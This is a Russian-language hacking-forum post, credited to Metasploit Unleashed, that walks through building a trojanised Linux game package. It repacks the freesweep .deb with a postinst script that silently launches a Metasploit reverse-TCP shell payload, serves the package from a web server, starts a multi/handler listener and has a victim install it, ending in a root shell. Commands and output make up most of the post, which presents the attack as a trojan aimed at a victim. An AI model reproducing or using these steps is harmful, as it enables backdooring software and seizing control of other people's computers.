Делаем троян для Линукс

Тема в разделе "СТАТЬИ И УРОКИ ПО ВЗЛОМУ И ОБХОДУ ЗАЩИТЫ", создана пользователем X-Shar, 31 янв 2014.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Отмечу что данная штука может заработать, а может и не заработать. Почему ? Потому-что это Линукс ! ;)

    Итак для того, чтобы продемонстрировать, что атаки на «стороне клиента» существуют не только под Windows, мы будем использовать Metasploit для создания Ubuntu deb пакета, чтобы заполучить shell на Linux.

    Что будет делать троян:

    Троян представляет собой игру под линукс, как только жертва установит и начнет играть в скаченную игру, мы получим Shell ! ;)

    Отличное видео выступиления Redmeat_uk демонстрации этой техники, вы можете увидеть на http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx

    Сначала необходимо загрузить пакет, который мы собираемся «заразить» и перенести его во временный рабочий каталог. В нашем примере мы будем использовать пакет freesweep, текстовая версия Mine Sweeper.

    Итак конструируем трояна:

    Через консоль вводим следующие команды:

    1)Команда: root@bt4:/pentest/exploits/framework3# apt-get --download-only install freeswee

    Ответ:
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    ...snip...

    2)Теперь переносим пакет во временный каталог следущими командами:

    root@bt4:/pentest/exploits/framework3# mkdir /tmp/evil
    root@bt4:/pentest/exploits/framework3# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
    root@bt4:/pentest/exploits/framework3# cd /tmp/evil/
    root@bt4:/tmp/evil#

    3) Далее, нам необходимо извлечь пакет в рабочую директорию и создать директорию DEBIAN для добавления наших дополнительных «возможностей».

    root@v-bt4-pre:/tmp/evil# dpkg -xfreesweep_0.90-1_i386.debwork
    root@v-bt4-pre:/tmp/evil# mkdir work/DEBIAN

    4) В директории «DEBIAN», создайте файл с именем «control», который содержит следующее:

    root@bt4:/tmp/evil/work/DEBIAN# cat control
    Package: freesweep
    Version: 0.90-1
    Section: Games and Amusement
    Priority: optional
    Architecture: i386
    Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
    Description: a text-based minesweeper
    Freesweep is an implementation of the popular minesweeper game, where
    one tries to find all the mines without igniting any, based on hints given
    by the computer. Unlike most implementations of this game, Freesweep
    works in any visual text display - in Linux console, in an xterm, and in
    most text-based terminals currently in use.

    5) Нам также необходимо создать после установочный скрипт, который задаст исполняющие права на наши бинарные файлы. В директории «DEBIAN», мы создадим файл с именем «postinst», который содержит следующее:

    root@bt4:/tmp/evil/work/DEBIAN# cat postinst
    #!/bin/sh
    sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

    6) Теперь создадим наше вредоносное содержимое. Мы будем использовать реверс-шелл бэк-коннекта для подключения к нашей машине под названием «freesweep_scores»:

    Команда:
    root@bt4:/pentest/exploits/framework3# ./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores

    Ответ:
    Created by msfpayload (http://www.metasploit.com).
    Payload: linux/x86/shell/reverse_tcp
    Length: 50
    Options: LHOST=192.168.1.101,LPORT=443

    7) Далее сделаем пост-установочный скрипт исполняемым и соберем наш новый пакет. Файл пакета будет называться «work.deb». Изменим его имя на freesweep.deb и скопируем пакет в корневой каталог нашего веб-сервера.

    Команды:
    root@bt4:/tmp/evil/work/DEBIAN# chmod 755 postinst
    root@bt4:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work

    Ответ:
    dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.

    Команды:
    root@bt4:/tmp/evil# mv work.deb freesweep.deb
    root@bt4:/tmp/evil# cp freesweep.deb /var/www/

    В общем-то и всё теперь как юзать:

    1) Для начала запустим веб сервер Apache:

    root@bt4:/tmp/evil# /etc/init.d/apache2 start

    2) Запустим модуль Metasploit multi/handler для ожидания входящего соединения:

    Команда:
    root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 E

    Ответ:
    [*] Please wait while we load the module tree...
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler...

    3) Нашу жертву под Ubuntu, мы должны убедить скачать и установить deb пакет с новой игрой:

    На компе жертвы установить можно, например так, вводим команды:

    ubuntu@ubuntu:~$ wget http://192.168.1.101/freesweep.deb
    ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb

    4) Как только жертва установит и начнет играть в скаченную игру, мы получим shell:

    [*] Sending stage (36 bytes)
    [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)
    ifconfig
    eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
    inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:49 errors:0 dropped:0 overruns:0 frame:0
    TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
    Interrupt:17 Base address:0x1400
    ...snip...
    hostname
    ubuntu
    id
    uid=0(root) gid=0(root) groups=0(root)

    Источник: http://www.offensive-security.com/metasploit-unleashed
     
    • Мне нравится Мне нравится x 6
    • Стрёмный копипаст ! Стрёмный копипаст ! x 1

Поделиться этой страницей